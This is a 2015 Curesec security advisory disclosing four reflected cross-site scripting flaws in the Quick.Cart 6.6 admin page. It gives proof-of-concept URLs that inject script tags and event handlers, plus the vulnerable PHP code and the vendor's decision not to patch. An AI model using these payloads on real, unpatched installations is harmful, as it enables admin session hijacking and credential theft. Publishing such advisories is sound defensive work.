Quick.Cart 6.6 Cross Site Scripting
Posted on 09 November 2015
Security Advisory - Curesec Research Team 1. Introduction Affected Product: Quick.Cart 6.6 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: info@opensolution.org Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/07/2015 Disclosed to public: 10/07/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Description Quick.Cart 6.6 is vulnerable to multiple reflected XSS attacks. With this, it is possible to inject JavaScript keylogger or perform phishing attacks. The vulnerabilities are all in the admin.php file. To add security through obscurity, Quick.Cart does suggest to rename this file, which would make it more difficult to exploit these vulnerabilities. The renaming is not mandatory. The vulnerabilities detailed below depend on the fact that the main entry points for users and admins contains a call to extract: index.php extract( $_GET ); admin.php extract( $_GET ); With this, it is possible to overwrite or set any variable. Because of this, it is not considered best-practice to pass user input to extract. The SESSION variable can not be set by an attacker, because session_start is called after extract, but variables such as SERVER or COOKIE and undefined variables can be set. This call also makes it possible to send POST requests via GET, making the exploitation of for example CSRF easier. It may have further negative effects as well. 3. Details XSS 1 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iStatus="><script>alert(1)</script> http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=orders-list&iProducts="><script>alert('xss')</script> Code: templates/admin/orders.php <form action="?p=<?php echo $p; ?><?php if( isset( $sPhrase ) ) echo '&sPhrase='.$sPhrase; ?><?php if( isset( $iStatus ) ) echo '&iStatus='.$iStatus; ?><?php if( isset( $iProducts ) ) echo '&iProducts='.$iProducts; ?>" method="post"> XSS 2 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?p=lang-translations&sLanguage=<script>alert(1)</script> Code: templates/admin/languages.php <h1><?php echo $lang['Languages'].( isset( $sLanguage ) ? ' '.$sLanguage : null ); ?><a href="<?php echo $config['manual_link']; ?>instruction#1.6" title="<?php echo $lang['Manual']; ?>" target="_blank"></a></h1> XSS 3 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_COOKIE[sLogin]=" autofocus onfocus="alert('xss') Code: common-admin.php $content = '<script type="text/javascript"> AddOnload( cursor ); </script><form method="post" action="'.$sLoginPage.'" name="form"><fieldset><input type="hidden" name="sLoginPageNext" value="'.$_SERVER['REQUEST_URI'].'" /><div id="login"><label>'.$lang['Login'].':</label><input type="text" name="sLogin" class="input" value="'.( isset( $_COOKIE['sLogin'] ) ? strip_tags( $_COOKIE['sLogin'] ) : null ).'" /></pre><div id="pass"><label>'.$lang['Password'].':</label><input type="password" name="sPass" class="input" value="" /></pre><div id="submit"><input type="submit" value="'.$lang['log_in'].' >>" /></pre></fieldset></form>'; XSS 4 Proof of Concept: http://localhost/ecommerce/Quick.Cart_v6.6/admin.php?_SERVER[HTTP_HOST]="></iframe><script>alert(1)</script>&_SERVER[SCRIPT_FILENAME]=/var/www/ecommerce/Quick.Cart_v6.6/admin.php Please note that the SCRIPT_FILENAME must be set correctly, as it's used as the name of the session key and overwriting one SERVER value leads to the deletion of all other SERVER values. Code: core/libraries/trash.php $GLOBALS['lang']['Language'] .= '<iframe src="http://opensolution.org/news,.html?sUrl='.$_SERVER['HTTP_HOST'].'" style="display:none;"></iframe>'; 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/07/2015 Informed Vendor about Issue 10/01/2015 Reminded Vendor of release date 10/01/2015 Vendor does not plan on releasing a fix, because the optional rename of the admin file may mitigate this issue already 10/07/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/QuickCart-66-Multiple-XSS-74.html